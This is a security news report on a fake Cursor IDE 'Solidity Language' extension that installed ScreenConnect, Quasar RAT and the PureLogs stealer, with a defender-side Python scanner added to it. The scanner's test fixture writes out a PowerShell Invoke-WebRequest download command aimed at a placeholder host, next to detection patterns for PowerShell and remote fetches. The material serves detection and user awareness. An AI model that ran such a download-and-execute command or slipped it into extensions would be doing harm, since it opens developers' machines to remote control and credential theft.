A fake extension for the Cursor AI IDE code editor installed remote access tools and infected devices with infostealers, which in one case led to the theft of $500,000 in cryptocurrency from a Russian crypto developer.
Cursor AI IDE is an AI-powered development environment based on Microsoft’s Visual Studio Code. It supports Open VSX, an alternative to the Visual Studio Marketplace, which lets users install VSCode-compatible extensions to expand the software’s functionality.
Kaspersky reports it was called in to investigate a security incident in which a Russian developer working in cryptocurrency reported that $500,000 in crypto had been stolen from his computer. The machine had no antivirus software installed but was thought to be clean.
George Kucherin, a security researcher at Kaspersky, obtained an image of the device’s hard drive and, after analyzing it, found a malicious JavaScript file named extension.js in the .cursor/extensions directory.
The extension, named “Solidity Language”, was published on the Open VSX registry and claimed to be a syntax highlighting tool for working with Ethereum smart contracts.
Although the plugin did implement working Solidity syntax highlighting, it also executed a malicious payload that downloaded a PowerShell script from a remote host at angelic(.)su.

Source: Kaspersky
The remote PowerShell script checked whether the ScreenConnect remote management tool was already installed and, if not, executed another script to install it.
Once ScreenConnect was installed, the threat actors had full remote access to the developer’s computer. Using ScreenConnect, the threat actor uploaded and executed VBScript files, which were used to download additional payloads onto the device.
In this attack, the final script downloaded a malicious executable from archive(.)org, a loader known as VMDetector, which installed:
- Quasar RAT: a remote access trojan capable of executing commands on infected devices.
- PureLogs stealer: an infostealer that steals credentials and authentication cookies from web browsers, as well as cryptocurrency wallets.
According to Kaspersky, Open VSX showed the extension had been downloaded 54,000 times before it was removed on 2 July. However, the researchers believe this install count was artificially inflated to lend the extension an air of legitimacy.
A day later, the attackers published an almost identical version under the name “Solidity”, inflating this extension’s install count to about two million.
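A defender-side check for this kind of extension, added here as an example rather than code from Kaspersky or the article: it walks an extensions root such as ~/.cursor/extensions, reads each package.json, and flags any extension.js that spawns a process, invokes PowerShell, or references a remote download, which a syntax-highlighting extension has no reason to do. The extension folder names, publisher names and the example.invalid host in the fixture are constructed.

```python
import json
import re
import tempfile
from pathlib import Path

# Indicators a syntax-highlighting extension has no reason to carry: process spawning, PowerShell, remote fetch.
SUSPICIOUS = {
    "spawns_process": re.compile(r"child_process|\bexec(?:Sync)?\(|\bspawn\("),
    "invokes_powershell": re.compile(r"powershell", re.IGNORECASE),
    "remote_download": re.compile(r"https?://[^\s'\"]+|DownloadString|Invoke-WebRequest|\biwr\b", re.IGNORECASE),
}

def scan_extension(ext_dir: Path) -> dict:
    """Inspect one installed extension and return its identity plus matched indicators."""
    pkg = ext_dir / "package.json"
    manifest = json.loads(pkg.read_text(encoding="utf-8")) if pkg.is_file() else {}
    hits = {}
    for js in ext_dir.rglob("*.js"):
        text = js.read_text(encoding="utf-8", errors="ignore")
        for label, pattern in SUSPICIOUS.items():
            if pattern.search(text):
                hits.setdefault(label, []).append(js.relative_to(ext_dir).as_posix())
    return {"dir": ext_dir.name, "name": manifest.get("name"),
            "publisher": manifest.get("publisher"), "indicators": hits, "suspicious": bool(hits)}

def scan_extensions_root(root: Path) -> list:
    """Scan every extension folder under an extensions root such as ~/.cursor/extensions."""
    return [scan_extension(d) for d in sorted(root.iterdir()) if d.is_dir()]

def build_sample(root: Path) -> None:
    """Constructed fixture (not real extensions): a grammar-only extension and a lookalike."""
    good = root / "goodpub.solidity-0.1.0"
    good.mkdir(parents=True)
    (good / "package.json").write_text(json.dumps({"name": "solidity", "publisher": "goodpub"}))
    (good / "extension.js").write_text("exports.activate = function () {};\n")
    bad = root / "lookalike.solidity-language-0.1.0"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({"name": "solidity-language", "publisher": "lookalike"}))
    # Placeholder host; mirrors the page's pattern of extension.js handing off to PowerShell.
    (bad / "extension.js").write_text(
        "const { exec } = require('child_process');\n"
        "exec('powershell -Command \"Invoke-WebRequest https://example.invalid/stage.ps1\"');\n")

def demo() -> list:
    """Build the fixture in a temp dir and scan it, returning one record per extension."""
    root = Path(tempfile.mkdtemp()) / "extensions"
    build_sample(root)
    return scan_extensions_root(root)
```

Matches are prompts for manual review rather than verdicts: language-server extensions legitimately spawn processes, so weigh the indicators against what the extension claims to do.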

Source: Kaspersky
Kaspersky says the threat actor was able to rank their extension above the legitimate one in Open VSX search results by gaming the ranking with the inflated install count. The victim installed the malicious extension believing it was the legitimate one.
The researchers also found similar extensions on Microsoft’s Visual Studio Code Marketplace, named “Solabot”, “Mount-Ath”, and “Blankebesxstnion”, which likewise executed a PowerShell script to install ScreenConnect and infostealers.
Kaspersky has warned that developers should be careful when downloading packages and extensions from open repositories, as these have become a common source of malware infections.
“Malicious packages continue to pose a significant threat to the crypto industry. Today, many projects rely on open-source tools downloaded from package repositories,” Kaspersky concluded.
“Unfortunately, packages from these repositories are often a source of malware infections. Therefore, we recommend extreme caution when downloading any tools. Always verify that the package you are downloading is not fake.”
“If a package does not work as advertised after installing it, be suspicious and check the downloaded source code.”